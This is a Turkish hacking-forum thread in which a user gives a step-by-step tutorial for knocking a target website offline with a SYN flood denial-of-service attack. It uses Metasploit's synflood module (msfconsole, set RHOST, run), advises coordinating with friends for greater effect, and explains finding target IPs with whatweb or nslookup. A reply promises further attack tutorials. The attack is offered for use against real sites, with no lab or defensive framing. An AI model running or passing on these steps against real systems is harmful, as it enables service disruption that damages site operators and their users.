Kali Linux SynFlood Saldırısı İle Hedef Site Çökmesi

MrVurucu

Katılımcı Üye
25 Mar 2016
373
0
root/Desktop
İyi günler normalde videolu anlatımda bulunacaktım ama kali linuxun video kaydedicisinde bir problem olduğu için makale yazmaya karar verdim.

Öncelikle SynFlood aynı dos(denial of service) da olduğu gibi hedef site sunucularına aşırı yüklenerek geçici - kalıcı şekilde sitenin çökmesine sebep olur.Sitenin güvenlik zaafiyetine göre çökmesi geçici veya tamamen olabilir.Anlatıma geçelim.

1-Terminale(uçbirim)
Kod:
[B]msfconsole[/B]
yazarak ****sploiti çalıştırıyoruz.
2-Çalıştırdıktan sonra msf> gelir buraya
Kod:
[B]use auxiliary/dos/tcp/synflood [/B]
yazıyoruz ve show options diyerek kullanım talimatlarına bakıyoruz.
3-Biz oradan RHOST u kullanacağız." set RHOST (hedef site ip adresi) diyoruz.(Ör: set RHOST 192.168.1.1)
4-Bu koddan sonra "run" yazarak saldırımızı başlatıyoruz. İşlem bu kadar...

Not: Bu işlem tek başına etki etmeyebilir birkaç arkadaşınız ile birlikte yaparsanız verim elde edebilirsiniz.

Not 2: Hedef ip adresini öğrenmek için whatweb veya nslookup yollarını kullanabiliriz.Daha bir sürü öğrenebileceğimiz toollarda var,dmitry wapiti gibi onlarıda kullanabilirsiniz.Ben whatwebi genelde tercih ediyorum.Nasıl öğreneceğimizi göstereyim.
-->Terminali açıyoruz whatweb hedef_site_url diyoruz.(Örnek whatweb google.com )
Bu şekilde sadece ip değil sitedeki subdomain iplerini,site scriptini öğrenebilirsiniz.

Umarım sizlere katkıda bulunabilmişimdir.

Hepinize İyi Forumlar ve Saygılar...
 
Son düzenleme:

MrVurucu

Katılımcı Üye
25 Mar 2016
373
0
root/Desktop
Yararlı bi konu eline saglik

Sağ olun hocam eğer konu rağbet görürse videolu anlatımı telefondan çekerek yapacağım . Daha bir sürü ise yarar toollar var bu sadece dos gibi saldırı yöntemi websploitten webkiller ile de yapılabiliyor aynı şekilde onuda anlatacağım
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.